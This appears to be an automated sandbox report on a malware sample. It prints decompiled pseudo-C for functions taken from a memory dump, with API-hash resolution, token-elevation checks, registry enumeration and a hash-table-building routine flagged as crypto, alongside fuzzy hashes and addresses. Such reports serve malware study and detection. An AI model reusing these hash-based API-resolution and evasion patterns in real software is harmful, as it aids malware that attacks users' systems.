Instruction ID: 54657d8a276cd24aa600885e6808349e449a21a584977fa1d790355de8fbadc7
Opcode Fuzzy Hash: 48822c07a41f11b243a306607094b00b4c7456231264d7b8e6290cc97b67c54b
Instruction Fuzzy Hash: 3901243128020BFBFA502AE46F48F7B764DCB81659F004835BA09A51A4EE12685CC731

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5C01, Relevance: 1.6, APIs: 1, Instructions: 59
fileCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E6E7D5C01(void* __ebx, void* __ecx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t6;
				void* _t11;
				void* _t19;
				void* _t21;
				long _t22;
				WCHAR** _t23;
				intOrPtr* _t30;
				WCHAR** _t31;
				long _t35;
				void* _t37;
				void* _t38;

				_t31 = __edi;
				_t35 = 3;
				if(__ebx != 2) {
					_t6 = 3;
					_t21 = 0;
					_t22 =  ==  ? _t6 : _t21;
				} else {
					_t22 = 1;
				}
				if(E6E7D3064(0x8e844d1e, 0x458d3b35) == 0) {
					_push(0);
				} else {
					_t19 = CreateFileW( *_t31, 0, _t22, 0, _t35, _a44, 0); // executed
					_push(_t19);
				}
				_t23 =  &(_t31[3]);
				E6E7CC26C(_t23);
				if(E6E7CC280(_t23) != 0) {
					_t31[2] = E6E7D35F0(0);
					_t11 = 0;
				} else {
					if( *((intOrPtr*)(_t38 + 0x24)) == 2) {
						_t30 = E6E7D3064(0x8e844d1e, 0xba53868);
						if(_t30 != 0) {
							 *_t30( *_t23, 0, 0, 2);
						}
					}
					_t37 = _t38 + 8;
					E6E7D3698(_t37, 0xff, 8);
					_t38 = _t38 + 0xc;
					if(E6E7D3064(0x8e844d1e, 0xc5e2981f) != 0) {
						_push(_t37);
						_push(_t37);
						_push(0);
						_push( *_t23);
						asm("int3");
						asm("int3");
					}
					_t11 = 1;
				}
				return _t11;
			}

0x6e7d5c01
0x6e7d5c05
0x6e7d5c09
0x6e7d5c12
0x6e7d5c18
0x6e7d5c19
0x6e7d5c0b
0x6e7d5c0d
0x6e7d5c0d
0x6e7d5c2f
0x6e7d5c43
0x6e7d5c31
0x6e7d5c3e
0x6e7d5c40
0x6e7d5c40
0x6e7d5c45
0x6e7d5c4a
0x6e7d5c58
0x6e7d5cc3
0x6e7d5cc6
0x6e7d5c5a
0x6e7d5c5f
0x6e7d5cac
0x6e7d5cb0
0x6e7d5cba
0x6e7d5cba
0x6e7d5cb0
0x6e7d5c61
0x6e7d5c6d
0x6e7d5c72
0x6e7d5c86
0x6e7d5c88
0x6e7d5c89
0x6e7d5c8a
0x6e7d5c8c
0x6e7d5c8e
0x6e7d5c8f
0x6e7d5c8f
0x6e7d5c92
0x6e7d5c92
0x6e7d5c9a

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,8E844D1E,458D3B35), ref: 6E7D5C3E

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction ID: b5fdc7bdf72db2ddef436fd0e88e8367f30bdad6871668a62aadd87d2bfc7cb4
Opcode Fuzzy Hash: 9388d6fc0ab44810084af1a5b0fc5f81b3c38bd3c3c93c53e58e45b453cb198f
Instruction Fuzzy Hash: 3401F73528020BFBE6502AE16F48F7B774DDF81659F004835BA09951A5EE12655DC731

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D5E10, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E6E7D5E10(void* __ecx, intOrPtr _a4) {
				long _v16;
				long _t4;
				void* _t8;
				void** _t9;
				intOrPtr _t17;
				long* _t18;

				_push(_t16);
				_t8 = __ecx;
				_t17 = _a4;
				if(_t17 != 0) {
					asm("pxor xmm0, xmm0");
					asm("movq [esi], xmm0");
				}
				_t9 = _t8 + 0xc;
				if(E6E7CC280(_t9) != 0) {
					L7:
					_t4 = 0;
					goto L10;
				} else {
					asm("stosd");
					asm("stosd");
					if(E6E7D3064(0x8e844d1e, 0xba53868) == 0) {
						_t4 = 0;
					} else {
						_t4 = SetFilePointer( *_t9, 0,  &_v16, 1); // executed
					}
					if(_t4 != 0xffffffff) {
						if(_t17 != 0) {
							 *_t18 = _t4;
							asm("movq xmm0, [esp]");
							asm("movq [esi], xmm0");
						}
						L10:
						return _t4;
					} else {
						goto L7;
					}
				}
			}

0x6e7d5e14
0x6e7d5e15
0x6e7d5e17
0x6e7d5e1d
0x6e7d5e1f
0x6e7d5e23
0x6e7d5e23
0x6e7d5e27
0x6e7d5e33
0x6e7d5e67
0x6e7d5e67
0x00000000
0x6e7d5e35
0x6e7d5e3a
0x6e7d5e3b
0x6e7d5e4f
0x6e7d5e60
0x6e7d5e51
0x6e7d5e5c
0x6e7d5e5c
0x6e7d5e65
0x6e7d5e6d
0x6e7d5e6f
0x6e7d5e72
0x6e7d5e77
0x6e7d5e77
0x6e7d5e7b
0x6e7d5e80
0x00000000
0x00000000
0x00000000
0x6e7d5e65

APIs

SetFilePointer.KERNELBASE(?,00000000,?,00000001,0BA53868,?,?,00000000,00000000,?,6E7D5D48,?,?), ref: 6E7D5E5C

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction ID: 82db7b8e3b4325a23b9610a81b35dfa8820d16f4e35c6103abb7c61bcf381bcb
Opcode Fuzzy Hash: c5b249cb0bd675f8c00ae2d5a69ae15c2bd38bea87aee8cce9b412d31bd4c1eb
Instruction Fuzzy Hash: 59F04E31608B12FBD75169B8AD40B8773DCDFD1750F104F39F5409A164EA6088488651

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D564C, Relevance: 1.5, APIs: 1, Instructions: 45
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E7D564C(void* __ecx) {
				long _t9;
				char* _t11;
				void* _t16;
				int _t17;
				int _t18;
				int* _t19;

				_t18 = 0;
				_t17 = _t19[0x48];
				_t16 = __ecx;
				_t11 =  &(_t19[1]);
				 *_t17 = 0;
				 *((intOrPtr*)(_t17 + 4)) = 0;
				 *((intOrPtr*)(_t17 + 8)) = 0;
				while(1) {
					 *_t19 = 0x105;
					if(E6E7D3064(0x150c05fc, 0xed2313f7) == 0) {
						goto L4;
					}
					_t9 = RegEnumValueA( *(_t16 + 4), _t18, _t11, _t19, 0, 0, 0, 0); // executed
					if(_t9 == 0) {
						goto L4;
					}
					return _t17;
					L4:
					E6E7CE644(_t17, _t11,  *_t17);
					_t18 = _t18 + 1;
				}
			}

0x6e7d5656
0x6e7d5658
0x6e7d565f
0x6e7d5661
0x6e7d5665
0x6e7d5667
0x6e7d566a
0x6e7d566d
0x6e7d566d
0x6e7d5687
0x00000000
0x00000000
0x6e7d5698
0x6e7d569c
0x00000000
0x00000000
0x6e7d56aa
0x6e7d56ad
0x6e7d56b2
0x6e7d56b7
0x6e7d56b7

APIs

RegEnumValueA.KERNELBASE(?,00000001,?,00000000,00000000,00000000,00000000,00000000,150C05FC,ED2313F7,?,?,150C05FC,ED2313F7), ref: 6E7D5698

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: EnumValue
String ID:
API String ID: 2814608202-0
Opcode ID: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction ID: ae8c8b278151af36be40bf909e67de059dbb07494e4a7d36f4926d841653f1cc
Opcode Fuzzy Hash: eaa139f66eab8ff4bbabcae264f96130f64c4111b48ae2ac250c1eeef9ea8eef
Instruction Fuzzy Hash: 72F0C8B520030AAFE7249E5ADD54DB7BBFDDBC1B50F00852DA0D542110EA31AC54C971

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D1030, Relevance: 1.5, APIs: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E6E7D1030(void* __ecx) {
				void* _v36;
				void* _v44;
				int _t15;
				intOrPtr* _t21;
				void* _t24;
				intOrPtr* _t25;

				_t24 = __ecx;
				 *_t25 = 0;
				_t21 = E6E7D306C(0x150c05fc, 0x1da4d409, 0x150c05fc, 0x150c05fc);
				if(_t21 == 0) {
					L5:
					return 0;
				}
				_push(_t25);
				_push(8);
				_push(_t24);
				if( *_t21() == 0 || E6E7D306C(0x150c05fc, 0xf2377aa1, 0x150c05fc, 0x150c05fc) == 0) {
					goto L5;
				} else {
					_t2 = _t25 + 8 - 4; // 0x150c05f8
					_t15 = GetTokenInformation( *(_t25 + 0x10), 0x14, _t2, 4, _t25 + 8); // executed
					if(_t15 == 0) {
						goto L5;
					}
					return 0 |  *((intOrPtr*)(_t25 + 4)) != 0x00000000;
				}
			}

0x6e7d103e
0x6e7d1040
0x6e7d104e
0x6e7d1052
0x6e7d109b
0x00000000
0x6e7d109b
0x6e7d1057
0x6e7d1058
0x6e7d105a
0x6e7d105f
0x00000000
0x6e7d1078
0x6e7d107c
0x6e7d1089
0x6e7d108d
0x00000000
0x00000000
0x00000000
0x6e7d1096

APIs

GetTokenInformation.KERNELBASE(00000004,00000014,150C05F8,00000004,150C05FC,150C05FC,150C05FC), ref: 6E7D1089

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction ID: 2facc822e2d1ca0664c0c60625c4d8acbdfd09e0180d59800f24874bfcf79fa0
Opcode Fuzzy Hash: 6e47646477a1af0dc4b2de091a4f50078e9155f62806ec5d6aed96985eb654ee
Instruction Fuzzy Hash: 7AF06870348647ABFB40A5B8AE68F7F32ED5BC1614F548838B540CA1A4DF74C94D8625

Uniqueness

Uniqueness Score: -1.00%

Function 6E7D3628, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 29%

			E6E7D3628(void* __ecx) {
				void* _t3;
				intOrPtr* _t7;
				void* _t9;

				_t9 = __ecx;
				if( *0x6e7dd228 == 0xa33c83e5) {
					_t7 = E6E7D3064(0x60a28c5c, 0x1c6ef387);
					 *0x6e7dd22c = E6E7D3064(0x60a28c5c, 0x5e0afaa3);
					if( *0x6e7dd228 == 0xa33c83e5) {
						 *_t7(2, 0, 0, 0, 0, 0); // executed
						 *0x6e7dd228 = 0;
					}
				}
				_t3 = E6E7D3064(0x60a28c5c, 0x45b68b68);
				if(_t3 == 0) {
					return 0;
				} else {
					_push(_t9);
					_push(8);
					_push( *0x6e7dd228);
					asm("int3");
					asm("int3");
					return _t3;
				}
			}

0x6e7d3630
0x6e7d3638
0x6e7d366b
0x6e7d367c
0x6e7d3687
0x6e7d3692
0x6e7d3694
0x6e7d3694
0x6e7d3687
0x6e7d3644
0x6e7d364b
0x00000000
0x6e7d364d
0x6e7d364d
0x6e7d364e
0x6e7d3650
0x6e7d3652
0x6e7d3653
0x00000000
0x6e7d3653

APIs

RtlCreateHeap.NTDLL(00000002,00000000,00000000,00000000,00000000,00000000,60A28C5C,5E0AFAA3,60A28C5C,1C6EF387,?,?,00000000,6E7CDE09,?,?), ref: 6E7D3692

Memory Dump Source

Source File: 00000000.00000002.1192296113.000000006E7C1000.00000020.00020000.sdmp, Offset: 6E7C0000, based on PE: true

Associated: 00000000.00000002.1192288446.000000006E7C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192315989.000000006E7DA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.1192324781.000000006E7DD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.1192332571.000000006E7DF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: bbba84513d02345235ee8c4d0c8c0e56420f8d7667871567637ff0b853d1751f
Instruction ID: ce96c327eb83f067533d71b767fc9c8ad880a2c27e2bcfaba57801352f3c6aff
Opcode Fuzzy Hash: bbba84513d02345235ee8c4d0c8c0e56420f8d7667871567637ff0b853d1751f
Instruction Fuzzy Hash: CAF09E30216280BEEA601DF6FD0CD529698FF50245F040C39F380E1124D7B48448CE35

Uniqueness

Uniqueness Score: -1.00%

Function 00A51000, Relevance: 1.4, APIs: 1, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE ref: 00A510FF

Memory Dump Source

Source File: 00000000.00000002.1191979360.0000000000A50000.00000040.00000001.sdmp, Offset: 00A50000, based on PE: true

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction ID: b2c18a76b1b0a95deafb66c1bac55b494e3435bc4a977e88fedf11591ee26d1e
Opcode Fuzzy Hash: a57c29dcdcfacf9aa16c2e0c098cfba5b3c29415035591b01ff4a810787df466
Instruction Fuzzy Hash: 3441E5B5E052198FDB04DFA8C5906AEBBF0FF48314F19856DE848AB340D375A885CF94

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6E7C1494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6E7C1494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6E7CF584( &_v72, 0);
				_v60 = 0xe7942190;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v76, E6E7CF4CC( &_v76) + 0x10);
				E6E7CF4BC( &_v80, E6E7CF4CC( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x4074eca0;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v84, E6E7CF4CC(_t325) + 0x10);
				E6E7CF4BC( &_v88, E6E7CF4CC( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0x742aedea;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v92, E6E7CF4CC(_t329) + 0x10);
				E6E7CF4BC( &_v96, E6E7CF4CC( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0x414fdf7;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v100, E6E7CF4CC(_t333) + 0x10);
				E6E7CF4BC( &_v104, E6E7CF4CC( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xdb41c42;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v108, E6E7CF4CC(_t337) + 0x10);
				E6E7CF4BC( &_v112, E6E7CF4CC( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0xb84fc88b;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v116, E6E7CF4CC(_t341) + 0x10);
				E6E7CF4BC( &_v120, E6E7CF4CC( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0x3937949d;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v124, E6E7CF4CC(_t345) + 0x10);
				E6E7CF4BC( &_v128, E6E7CF4CC( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x840d15ae;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v132, E6E7CF4CC(_t349) + 0x10);
				E6E7CF4BC( &_v136, E6E7CF4CC( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0xe96b154c;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v140, E6E7CF4CC(_t353) + 0x10);
				E6E7CF4BC( &_v144, E6E7CF4CC( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
				_t357 =  &_v148;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v148 + 0x10)) = 0x35237dcf;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v148, E6E7CF4CC(_t357) + 0x10);
				E6E7CF4BC( &_v152, E6E7CF4CC( &_v152) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v160 = _v160 + 1;
				_t361 =  &_v156;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v156 + 0x10)) = 0x60014416;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v156, E6E7CF4CC(_t361) + 0x10);
				E6E7CF4BC( &_v160, E6E7CF4CC( &_v160) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v168 = _v168 + 1;
				_t365 =  &_v164;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v164 + 0x10)) = 0x9376283c;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v164, E6E7CF4CC(_t365) + 0x10);
				E6E7CF4BC( &_v168, E6E7CF4CC( &_v168) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v176 = _v176 + 1;
				_t369 =  &_v172;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v172 + 0x10)) = 0x1c6ef387;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v172, E6E7CF4CC(_t369) + 0x10);
				E6E7CF4BC( &_v176, E6E7CF4CC( &_v176) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v184 = _v184 + 1;
				_t373 =  &_v180;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v180 + 0x10)) = 0x45b68b68;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v180, E6E7CF4CC(_t373) + 0x10);
				E6E7CF4BC( &_v184, E6E7CF4CC( &_v184) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v192 = _v192 + 1;
				_t377 =  &_v188;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v188 + 0x10)) = 0x5d116ac0;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v188, E6E7CF4CC(_t377) + 0x10);
				E6E7CF4BC( &_v192, E6E7CF4CC( &_v192) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v200 = _v200 + 1;
				_t381 =  &_v196;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v196 + 0x10)) = 0x4b736e38;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v196, E6E7CF4CC(_t381) + 0x10);
				E6E7CF4BC( &_v200, E6E7CF4CC( &_v200) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v208 = _v208 + 1;
				_t385 =  &_v204;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v204 + 0x10)) = 0x5e0afaa3;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v204, E6E7CF4CC(_t385) + 0x10);
				E6E7CF4BC( &_v208, E6E7CF4CC( &_v208) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t434 = _t480;
				 *_t434 =  *_t434 + 1;
				E6E7D4200(0x60a28c5c, _t434);
				E6E7CF4BC( &_v212, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x450], xmm0");
				E6E7CF4BC( &_v216, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x458], xmm0");
				E6E7CF4BC( &_v220, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x460], xmm0");
				E6E7CF4BC( &_v224, 0x40);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x468], xmm0");
				E6E7CF4BC( &_v228, 0x50);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x470], xmm0");
				E6E7CF4BC( &_v232, 0x60);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x478], xmm0");
				E6E7CF4BC( &_v236, 0x70);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x480], xmm0");
				E6E7CF4BC( &_v240, 0x80);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x488], xmm0");
				E6E7CF4BC( &_v244, 0x90);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x490], xmm0");
				E6E7CF4BC( &_v248, 0xa0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x498], xmm0");
				E6E7CF4BC( &_v252, 0xb0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a0], xmm0");
				E6E7CF4BC( &_v256, 0xc0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4a8], xmm0");
				E6E7CF4BC( &_v260, 0xd0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b0], xmm0");
				E6E7CF4BC( &_v264, 0xe0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4b8], xmm0");
				E6E7CF4BC( &_v268, 0xf0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c0], xmm0");
				E6E7CF4BC( &_v272, 0x100);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4c8], xmm0");
				_t282 = E6E7CF4BC( &_v276, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [esp], xmm0");
				_v252 = E6E7C1D2C(_v248, _t434, _t481, _t282, _t282);
				_t318 = _t434;
				E6E7CB27C( &_v248, _v256, _t481, _v252, _t318);
				E6E7CF840( &_v296, _t481);
				_v300 = 0;
				_t410 =  &_v296;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v296 + 0x10)) = 0x3e0af193;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v296, E6E7CF4CC(_t410) + 0x10);
				E6E7CF4BC( &_v300, E6E7CF4CC( &_v300) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v308 = _v308 + 1;
				_t414 =  &_v304;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v304 + 0x10)) = 0xb5ca9b57;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v304, E6E7CF4CC(_t414) + 0x10);
				E6E7CF4BC( &_v308, E6E7CF4CC( &_v308) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v316 = _v316 + 1;
				_t418 =  &_v312;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v312 + 0x10)) = 0xdba36f91;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v312, E6E7CF4CC(_t418) + 0x10);
				E6E7CF4BC( &_v316, E6E7CF4CC( &_v316) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v324 = _v324 + 1;
				_t422 =  &_v320;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v320 + 0x10)) = 0x2d1ecde3;
				asm("movq [ecx+0x18], xmm0");
				E6E7CF828( &_v320, E6E7CF4CC(_t422) + 0x10);
				E6E7CF4BC( &_v324, E6E7CF4CC( &_v324) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t480 =  *_t480 + 1;
				_t310 = _t480;
				_push(_t310);
				_push(_t318);
				_push(_v292);
				_t154 = _t310 + 0x2c; // 0x2c
				E6E7CB9FC(_t154,  *_t480);
				E6E7CF4BC( &_v340, 0);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d8], xmm0");
				E6E7CF4BC( &_v344, 0x10);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e0], xmm0");
				E6E7CF4BC( &_v348, 0x20);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4d0], xmm0");
				E6E7CF4BC( &_v352, 0x30);
				asm("movq xmm0, [eax+0x8]");
				asm("movq [ebp+0x4e8], xmm0");
				E6E7CF654( &_v316);
				return E6E7CF654( &_v356);
			}

0x6e7c1494
0x6e7c1498
0x6e7c149d
0x6e7c14a3
0x6e7c14ab
0x6e7c14b0
0x6e7c14bc
0x6e7c14c0
0x6e7c14d2
0x6e7c14e8
0x6e7c14f3
0x6e7c14f4
0x6e7c14f5
0x6e7c14f6
0x6e7c14f7
0x6e7c14fa
0x6e7c14fe
0x6e7c1502
0x6e7c1509
0x6e7c151b
0x6e7c1531
0x6e7c153c
0x6e7c153d
0x6e7c153e
0x6e7c153f
0x6e7c1540
0x6e7c1543
0x6e7c1547
0x6e7c154b
0x6e7c1552
0x6e7c1564
0x6e7c157a
0x6e7c1585
0x6e7c1586
0x6e7c1587
0x6e7c1588
0x6e7c1589
0x6e7c158c
0x6e7c1590
0x6e7c1594
0x6e7c159b
0x6e7c15ad
0x6e7c15c3
0x6e7c15ce
0x6e7c15cf
0x6e7c15d0
0x6e7c15d1
0x6e7c15d2
0x6e7c15d5
0x6e7c15d9
0x6e7c15dd
0x6e7c15e4
0x6e7c15f6
0x6e7c160c
0x6e7c1617
0x6e7c1618
0x6e7c1619
0x6e7c161a
0x6e7c161b
